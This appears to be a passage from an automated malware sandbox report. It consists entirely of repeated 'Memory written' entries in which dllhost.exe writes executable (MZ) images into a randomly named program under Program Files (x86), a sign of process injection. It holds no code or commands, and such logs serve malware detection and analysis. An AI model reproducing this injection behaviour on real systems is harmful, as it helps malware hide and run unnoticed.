Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
